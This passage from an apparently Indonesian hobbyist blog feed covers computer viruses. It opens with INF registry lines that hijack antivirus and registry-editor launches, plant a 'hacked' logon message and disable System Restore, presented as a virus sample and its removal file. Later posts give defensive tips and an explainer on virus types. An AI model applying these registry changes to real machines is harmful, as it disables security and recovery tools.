Options\regedit.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption", "H4x0r3d By Flyff 666"&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community"&lt;br /&gt;HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"&lt;br /&gt;HKLM, SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"&lt;br /&gt;HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"&lt;br /&gt;HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"&lt;br /&gt;---------------------------------------------------------------------------------------------&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Cadmin%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0cm; 	mso-margin-bottom-alt:auto; 	margin-left:0cm; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:612.0pt 792.0pt; 	margin:72.0pt 90.0pt 72.0pt 90.0pt; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : JATIxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.&lt;/p&gt; &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-7992805406076564461?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/7992805406076564461/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2010/01/sampel-virus.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7992805406076564461'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7992805406076564461'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2010/01/sampel-virus.html' title='sampel virus'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-5318262786241631170</id><published>2009-06-01T11:04:00.003+07:00</published><updated>2009-06-01T11:58:27.576+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mencegah viruz'/><title type='text'>menangkal virus masuk tanpa antivirus</title><content type='html'>nah ini ketemu lagi...&lt;br /&gt;kamu belum punya antivirus dikomputer?....&lt;br /&gt;atau antivirus kamu udah kadaluarsa alias out off date?&lt;br /&gt;jangan khawatir sekarang kamu ga perlu takut ma ntu viruz viruz nakal...&lt;br /&gt;ini tipsnya :&lt;br /&gt;1. baca basmalah dulu...&lt;br /&gt;2. hidupkan kompi kamu... terus langkah pertamanya yaitu kita buka semua file yang ter hidden ..&gt;&gt; caranya : klik explorer(klik kanan pada start)&gt;&gt; Tools, &gt;&gt; Folder options, &gt;&gt;&gt; view &gt;&gt; show hidden file and folders dan hilangkan cheklist pada hide extension for known file type, dan hilangkan cheklist juga pada hide protected operating system file&gt;&gt;&gt; kalo ada pertanyaan jawab yes atau enter ajah,  terus klik apply, &gt;&gt;&gt; ok&lt;br /&gt;3. non aktivkan auto play caranya :  klik start,&gt;&gt;&gt; run &gt;&gt; ketik gpedit.msc, &gt;&gt;&gt; ok &gt;&gt;&gt; nanti muncul group policy &gt;&gt; lihat pada komputer konfiguration &gt;&gt; klik administrativ template &gt;&gt;&gt; klik 2x pada system kemudian cari turn off auto play, &gt;&gt;&gt; klik enable, &gt;&gt;&gt; klik alldrive pada turn off auto play on, terus lakukan hal yang sama pada user configuration itu lho dibawah komputer configuration. &lt;&lt;&lt;&lt; fungsi dari hal ini adalah untuk mencegah virus masuk menggunakan program autorun.inf jadi flashdisk apapun yang terserang/ terinfeksi viruz tidak akan menular di komputer kita secara otomatis..&lt;br /&gt;4. dari no 3 sebenarnya komputer kita relatif aman tapi kalo ada trojan yang menyamar dengan icon word, exel atau jpg kita bisa ketipu dan malah mengaktifkan viruz di kompi kita. untuk itu kita harus tau mana file virus mana file yang bukan, caranya yaitu : tiap masukin flash disk klik explorer pada start terus klik view &gt;&gt;detail, perhatikan pada name..size..dan type, &gt;&gt; jika pada type muncul tulisan aplication padahal namenya icon word, excel, maupun jpg dan berextension.exe berarti itu file viruz dan liat sizenya pasti sama, langsung aja kita hapus caranya klik 1x (jgn 2x)tekan Shift+delete periksa semua yah jangan sampai ada file viruz yang tercecer, terus jangan lupa file dengan nama autorun.inf juga dihapus, setelah itu perhatikan juga file yang kira kira belum pernah kita masukin tapi muncul disitu langsung aja disikat. eh file dengan nama recycler sikat sekalian karena itu bisa jadi viruz juga&lt;br /&gt;terus file asli kita yang dihidden atau berbayang kita kembalikan lagi seperti semula caranya liat pada posting sebelum ini dengan judul mengembalikan file yang dihidden viruz, &lt;&lt;&lt;&lt; oke sekarang kompi kita aman tak ada seekor viruzpun bisa masuk ke kompi lewat flashdisk maupun media penyimpanan lainya. dan kamu tambah jago jadi dukun komputer... he he he...&lt;br /&gt;siapa dulu gurunya  &lt;jati gitu lho&gt;&lt;br /&gt;oke selamat mencoba...&lt;br /&gt;sorry lowbat nih... sampai ketemu lain waktu&lt;br /&gt;perangi viruz sampai mati...&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-5318262786241631170?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/5318262786241631170/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2009/06/menangkal-virus-masuk-tanpa-antivirus.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/5318262786241631170'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/5318262786241631170'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2009/06/menangkal-virus-masuk-tanpa-antivirus.html' title='menangkal virus masuk tanpa antivirus'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-1435021715285823839</id><published>2009-05-23T20:58:00.002+07:00</published><updated>2009-05-23T21:17:58.956+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mengembalikan file terhidden'/><title type='text'>mengembalikan data yang dihidden virus</title><content type='html'>ketemu lagi di postingan &gt;&gt; cozz dah lama blog ini ga di update&lt;br /&gt;ok... langsung aja deh....&lt;br /&gt;gini&gt;&gt;&gt; kamu pernah punya data dikomputer, terus tiba tiba lenyap dan berganti menjadi extension exe.  wah udah pasti tuh kompi kamu kena viruz&lt;br /&gt;terus kamu instal antivirus yang baru...&gt;&gt;&gt;&gt; eh pas discan malah data ilang semua&lt;br /&gt;pasti kamu panik setengah hidup , mana data penting lagi&gt;&gt;&gt;&lt;br /&gt;sekarang kamu jangan bingung dan panik, sebenarnya data kamu cuma dihidden oleh si viruz&lt;br /&gt;yang dia tampilkan cuma icon word/exel/jpg dengan nama file kamu dan dibelakangnya extensionya diganti .exe, itulah sebenarnya file siviruz yang menyamar jadi file dengan nama yang sama, makanya kalo kedetek antiviruz langsung didelete/remove to vault. alhasil file asli kamu ga kelihatan karena di hidden, cara mengembalikanya sangat mudah....&lt;br /&gt;mau tau?&gt;&gt;&gt;&gt;&gt;&gt;&gt;&lt;br /&gt;ok deh gw kasih tutorialnya&lt;br /&gt;langkah langkahnya&lt;br /&gt;1. siapkan snack + minuman&lt;br /&gt;2. baca basmalah&lt;br /&gt;3. siapkan kompi kamu buka notepad&gt;&gt;&gt; dah tau notepad kan itu lho klik di start&gt;&gt;all program&gt;&gt;acessoris&gt;&gt;notepad&lt;br /&gt;terus ketik di notepad:&lt;br /&gt;attrib -r -a -s -h /s /d&lt;br /&gt;exit&lt;br /&gt;&lt;br /&gt;terus kamu simpan dengan nama unhidden.bat&lt;br /&gt;nah kalo udah taruh tuh file unhidden.bat ditempat dimana kamu menyimpan file file yang hilang &gt;&gt; misal di D: atau di flashdisk, trus klik 2 kali, tunggu beberapa saat, kalo filenya banyak biasanya jadi agak lama.&lt;br /&gt;nah sekarang file kamu dah kembali&lt;br /&gt;4. sekarang baca hamdalah&lt;br /&gt;&lt;br /&gt;nah kamu udah jadi dukun komputer yang bisa menyulap yang hilang jadi ada&lt;br /&gt;ok... deh lain waktu gw akan ngebahas trik menjauhkan kompi kita dari si viruzz nakal tanpa antivirus sekalipun&lt;br /&gt;ok... see you next time&lt;br /&gt;be better now&lt;br /&gt;perangi virus dari sekarang&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-1435021715285823839?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/1435021715285823839/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2009/05/mengembalikan-data-yang-dihidden-virus.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/1435021715285823839'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/1435021715285823839'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2009/05/mengembalikan-data-yang-dihidden-virus.html' title='mengembalikan data yang dihidden virus'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-6320916945340417463</id><published>2008-12-28T16:55:00.000+07:00</published><updated>2008-12-28T16:56:53.697+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VIRUS'/><title type='text'>MENGENAL VIRUS KOMPUTER</title><content type='html'>Mengenal Virus Komputer&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah “virus” yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat kita semua mengerti dan memahami tentang virus. &lt;br /&gt;&lt;br /&gt;ASAL MUASAL VIRUS &lt;br /&gt;1949, John von Neumann, menggungkapkan " teori self altering automata " yang merupakan hasil riset dari para ahli matematika. &lt;br /&gt;1960, Lab BELL (AT&amp;T), para ahli di lab BELL (AT&amp;T) mencoba-coba teori yang diungkapkan oleh John von Neumann, dengan membuat suatu jenis permainan/game. Mereka membuat program yang dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan. Program yang mampu bertahan dan menghancurkan semua program lain, akan dianggap sebagai pemenangnya. Permainan ini akhirnya menjadi permainan favorit di tiap-tiap lab komputer. Tetapi, semakin lama program yang diciptakan makin berbahaya, sehingga mereka melakukan pengawasan dan pengamanan yang ketat terhadap permainan ini. &lt;br /&gt;1980, Program-program tersebut yang akhirnya dikenal dengan sebutan "virus" ini berhasil menyebar keluar lingkungan laboratorium, dan mulai beredar di masyarakat umum. &lt;br /&gt;&lt;br /&gt;PENGERTIAN VIRUS &lt;br /&gt;"A program that can infect other programs by modifying them to include a slighty altered copy of itself. A virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every programs that gets infected can also act as a virus that infection grows“ &lt;br /&gt;( Fred Cohen ) &lt;br /&gt;&lt;br /&gt; &lt;br /&gt;Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran (biological viruses). &lt;br /&gt;Virus komputer bisa diartikan sebagai suatu program komputer biasa. Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi, disinilah perbedaannya dengan "worm". Tulisan ini tidak akan bahas worm karena nanti akan mengalihkan kita dari pembahasan mengenai virus ini. &lt;br /&gt;&lt;br /&gt;KRITERIA VIRUS &lt;br /&gt;Suatu program dapat disebut sebagai suatu virus apabila memenuhi minimal 5 kriteria berikut : &lt;br /&gt;1. Kemampuan untuk mendapatkan informasi &lt;br /&gt;2. Kemampuan untuk memeriksa suatu file &lt;br /&gt;3. Kemampuan untuk menggandakan diri dan menularkan diri &lt;br /&gt;4. Kemampuan melakukan manipulasi &lt;br /&gt;5. Kemampuan untuk menyembunyikan diri. &lt;br /&gt;Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sangat diperlukan. &lt;br /&gt;&lt;br /&gt;1. Kemampuan untuk mendapatkan informasi &lt;br /&gt;Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory. Untuk apa? Agar dia dapat memperoleh daftar file yang bisa dia tulari. Misalnya, virus makro yang akan menginfeksi semua file data MS Word, akan mencari daftar file berekstensi *.doc. Disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, lalu memilahnya dengan mencari file-file yang bisa ditulari. Biasanya data ini tercipta saat file yang tertular/terinfeksi virus atau file program virus itu sendiri dibuka oleh user. Sang virus akan segera melakukan pengumpulan data dan menaruhnya (biasanya) di RAM, sehingga apabila komputer dimatikan semua data hilang. Tetapi data-data ini akan tercipta kembali setiap kali virus itu diaktifkan. Biasanya data-data ini disimpan juga sebagai hidden file oleh virus tersebut. &lt;br /&gt;&lt;br /&gt;2. Kemampuan memeriksa suatu program &lt;br /&gt;Suatu virus juga harus bisa memeriksa suatu file yang akan ditulari, misalnya dia bertugas menulari program berekstensi *.doc, maka dia harus memeriksa apakah file dokumen tersebut telah terinfeksi ataupun belum, karena jika sudah, akan percuma menularinya lagi. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program. Yang umum dilakukan oleh virus adalah memiliki/memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut. Contoh penandaan adalah misalnya memberikan suatu byte yang unik di setiap file yang telah terinfeksi. &lt;br /&gt;&lt;br /&gt;3. Kemampuan untuk menggandakan diri &lt;br /&gt;Kalo ini memang virus "bang-get", maksudnya, tanpa kemampuan ini tak adalah virus. Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari file lainnya. Suatu virus apabila telah menemukan calon korbannya maka ia akan mengenalinya dengan memeriksanya. Jika belum terinfeksi maka sang virus akan memulai aksinya penularan dengan cara menuliskan byte pengenal pada file tersebut, dan seterusnya mengcopikan/menulis kode objek virus diatas file sasaran. Beberapa cara umum yang dilakukan oleh virus untuk menulari/menggandakan dirinya adalah : &lt;br /&gt;a. File yang akan ditulari dihapus atau diubah namanya. Kemudian diciptakan suatu file berisi program virus itu sendiri menggunakan nama file yang asli. &lt;br /&gt;b. Program virus yang sudah dieksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi seluruh file yang ada. &lt;br /&gt;&lt;br /&gt;4. Kemampuan mengadakan manipulasi &lt;br /&gt;Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file. Isi dari suatu rutin ini dapat beragam mulai dari yang tidak berbahaya sampai yang melakukan perusakan. Rutin ini umumnya digunakan untuk memanipulasi file atau pun mempopulerkan pembuatnya ! Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System), sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi. Misal : &lt;br /&gt;a. Membuat gambar atau pesan pada monitor &lt;br /&gt;b. Mengganti/mengubah-ubah label dari tiap file, direktori, atau label dari drive di PC &lt;br /&gt;c. Memanipulasi file yang ditulari &lt;br /&gt;d. Merusak file &lt;br /&gt;e. Mengacaukan kerja printer, dsb &lt;br /&gt;&lt;br /&gt;5. Kemampuan Menyembunyikan diri &lt;br /&gt;Kemampuan menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana. &lt;br /&gt;Langkah langkah yang biasa dilakukan adalah: &lt;br /&gt;- Program virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai &lt;br /&gt;- Program virus diletakkan pada Boot Record atau track pada disk yang jarang diperhatikan oleh komputer itu sendiri &lt;br /&gt;- Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak terlalu berubah ukurannya &lt;br /&gt;- Virus tidak mengubah keterangan/informasi waktu suatu file &lt;br /&gt;SIKLUS HIDUP VIRUS &lt;br /&gt;Siklus hidup virus secara umum, melalui 4 tahap: &lt;br /&gt; o Dormant phase ( Fase Istirahat/Tidur ) &lt;br /&gt;Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal: tanggal yang ditentukan, kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini. &lt;br /&gt;o Propagation phase ( Fase Penyebaran ) &lt;br /&gt;Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, RAM dsb). Setiap program yang terinfeksi akan menjadi hasil “kloning” virus tersebut (tergantung cara virus tersebut menginfeksinya). &lt;br /&gt;o Trigerring phase ( Fase Aktif ) &lt;br /&gt;Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant Phase. &lt;br /&gt;o Execution phase ( Fase Eksekusi ) &lt;br /&gt;Pada fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb &lt;br /&gt;&lt;br /&gt;JENIS – JENIS VIRUS &lt;br /&gt;Untuk lebih mempertajam pengetahuan kita tentang virus, saya akan coba memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran di masyarakat umum. &lt;br /&gt;1. Virus Makro &lt;br /&gt;Jenis virus ini pasti sudah sangat sering kita dengar. Virus ini ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila aplikasi pembentuknya dapat berjalan dengan baik. Sebagai contoh jika pada komputer mac dijalankan aplikasi Word, maka virus makro yang dibuat dari bahasa makro Word dapat bekerja pada komputer bersistem operasi Mac ini. &lt;br /&gt;Contoh virus: &lt;br /&gt;- Varian W97M, misal W97M.Panther &lt;br /&gt;Panjang 1234 bytes, akan menginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka. &lt;br /&gt;- WM.Twno.A;TW &lt;br /&gt;Panjang 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya berekstensi *.DOT dan *.DOC &lt;br /&gt;- dll &lt;br /&gt;2. Virus Boot Sector &lt;br /&gt;Virus Boot sector ini sudah umum sekali menyebar. Virus ini dalam menggandakan dirinya, akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan diload ke memori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar (contoh : monitor, printer dsb) dan dari memori ini pula virus akan menyebar ke seluruh drive yang ada dan yang terhubung ke komputer (contoh : floopy, drive lain selain drive c:). &lt;br /&gt;Contoh virus : &lt;br /&gt;- Varian virus wyx &lt;br /&gt;ex: wyx.C(B) menginfeksi boot record dan floopy ; &lt;br /&gt;Panjang :520 bytes; &lt;br /&gt;Karakteristik : memory resident dan terenkripsi. &lt;br /&gt;- Varian V-sign : &lt;br /&gt;Menginfeksi : Master Boot Record ; &lt;br /&gt;Panjang 520 bytes; &lt;br /&gt;Karakteristik : menetap di memori (memory resident),terenkripsi, dan polymorphic) &lt;br /&gt;- Stoned.june 4th/ bloody!: &lt;br /&gt;Menginfeksi : Master Boot Record dan floopy; &lt;br /&gt;Panjang 520 bytes; &lt;br /&gt;Karakteristik : menetap di memori (memory resident), terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali. &lt;br /&gt;3. Stealth Virus &lt;br /&gt;Virus ini akan menguasai tabel interrupt pada DOS yang sering kita kenal dengan "Interrupt interceptor". Virus ini berkemampuan untuk mengendalikan instruksi-instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya. &lt;br /&gt;Contoh virus : &lt;br /&gt;- Yankee.XPEH.4928, &lt;br /&gt;Menginfeksi file *.COM dan *.EXE ; &lt;br /&gt;Panjang 4298 bytes; &lt;br /&gt;Karakteristik: menetap di memori, ukuran tersembunyi, memiliki pemicu &lt;br /&gt;- WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth dimasukkan pula disini), Menginfeksi floopy dan motherboot record; &lt;br /&gt;Panjang 520 bytes; &lt;br /&gt;Karakteristik : menetap di memori; ukuran dan virus tersembunyi. &lt;br /&gt;- Vmem(s): &lt;br /&gt;Menginfeksi file file *.EXE, *.SYS, dan *.COM ; &lt;br /&gt;Panjang fie 3275 bytes; &lt;br /&gt;Karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi. &lt;br /&gt;- dll &lt;br /&gt;&lt;br /&gt;4. Polymorphic Virus &lt;br /&gt;Virus ini Dirancang buat mengecoh program antivirus, artinya virus ini selalu berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah strukturnya setiap kali selesai menginfeksi file/program lain. &lt;br /&gt;Contoh virus: &lt;br /&gt;- Necropolis A/B, &lt;br /&gt;Menginfeksi file *.EXE dan *.COM; &lt;br /&gt;Panjang file 1963 bytes; &lt;br /&gt;Karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan dapat berubah ubah struktur &lt;br /&gt;- Nightfall, &lt;br /&gt;Menginfeksi file *.EXE; &lt;br /&gt;Panjang file 4554 bytes; &lt;br /&gt;Karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, terenkripsi dan dapat berubah-ubah struktur &lt;br /&gt;- dll &lt;br /&gt;5. Virus File/Program &lt;br /&gt;Virus ini menginfeksi file-file yang dapat dieksekusi langsung dari sistem operasi, baik itu file *.EXE, maupun *.COM biasanya juga hasil infeksi dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya. &lt;br /&gt;6. Multi Partition Virus &lt;br /&gt;Virus ini merupakan gabungan dari virus boot sector dan virus file. Artinya pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-file *.EXE atau *.COM dan juga menginfeksi boot sector. &lt;br /&gt;&lt;br /&gt;BEBERAPA CARA PENYEBARAN VIRUS &lt;br /&gt;Virus layaknya virus biologi harus memiliki media untuk dapat menyebar, virus komputer dapat menyebar ke berbagai komputer/mesin lainnya juga melalui berbagai media, diantaranya: &lt;br /&gt;1. Disket, media storage R/W &lt;br /&gt;Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya. Media yang bias melakukan operasi R/W (Read dan Write) sangat memungkinkan untuk ditumpangi virus dan dijadikan sebagai media penyebaran. &lt;br /&gt;2. Jaringan ( LAN, WAN,dsb) &lt;br /&gt;Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu virus ikut berpindah saat terjadi pertukaran/pengeksekusian file yang mengandung virus. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. WWW (internet) &lt;br /&gt;Sangat mungkin suatu situs sengaja ditanamkan suatu “virus” yang akan menginfeksi komputer-komputer yang mengaksesnya. &lt;br /&gt;4. Software yang Freeware, Shareware atau bahkan Bajakan &lt;br /&gt;Banyak sekali virus yang sengaja ditanamkan dalam suatu program yang disebarluaskan baik secara gratis, atau trial version. &lt;br /&gt;5. Attachment pada email, transfering file &lt;br /&gt;Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan email attachment dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk berkomunikasi, file-file ini sengaja dibuat mencolok/menarik perhatian, bahkan seringkali memiliki ekstensi ganda pada penamaan filenya. 